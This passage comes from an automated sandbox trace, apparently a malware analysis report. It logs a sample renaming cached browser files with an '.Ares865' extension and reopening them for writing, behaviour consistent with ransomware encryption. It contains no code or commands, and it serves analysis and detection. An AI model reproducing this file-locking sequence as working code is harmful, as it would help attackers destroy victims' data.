Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js.ares865"), dwFlags=0x1) returned 1 [0095.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.282] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71733) returned 1 [0095.288] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1].Ares865") returned 120 [0095.288] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1].ares865"), dwFlags=0x1) returned 1 [0095.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\async_usersync[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\async_usersync[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.289] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1347) returned 1 [0095.292] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot.Ares865") returned 116 [0095.292] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot.ares865"), dwFlags=0x1) returned 1 [0095.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34534) returned 1 [0095.298] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png.Ares865") returned 117 [0095.298] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png.ares865"), dwFlags=0x1) returned 1 [0095.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.300] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=704) returned 1 [0095.303] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png.Ares865") returned 117 [0095.303] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png.ares865"), dwFlags=0x1) returned 1 [0095.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=551) returned 1 [0095.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg.Ares865") returned 117 [0095.307] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.309] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8515) returned 1 [0095.312] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg.Ares865") returned 117 [0095.312] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.314] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2322) returned 1 [0095.316] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg.Ares865") returned 117 [0095.316] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.318] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1768) returned 1 [0095.320] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg.Ares865") returned 117 [0095.321] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.322] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14034) returned 1 [0095.325] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg.Ares865") returned 117 [0095.325] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.327] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1886) returned 1 [0095.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg.Ares865") returned 117 [0095.330] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.331] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1756) returned 1 [0095.334] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg.Ares865") returned 117 [0095.334] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.335] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2494) returned 1 [0095.338] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg.Ares865") returned 117 [0095.338] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.340] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5780) returned 1 [0095.351] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg.Ares865") returned 117 [0095.351] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.352] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUL3E[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbul3e[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2141) returned 1 [0095.358] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg.Ares865") returned 117 [0095.358] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.360] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2168) returned 1 [0095.362] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg.Ares865") returned 117 [0095.362] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg.ares865"), dwFlags=0x1) returned 1 [0095.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.364] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2168) returned 1 [0095.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg.Ares865") returned 117 [0095.367] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBX3z0[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbx3z0[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1919) returned 1 [0095.371] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg.Ares865") returned 117 [0095.372] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyew1[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYEW1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet 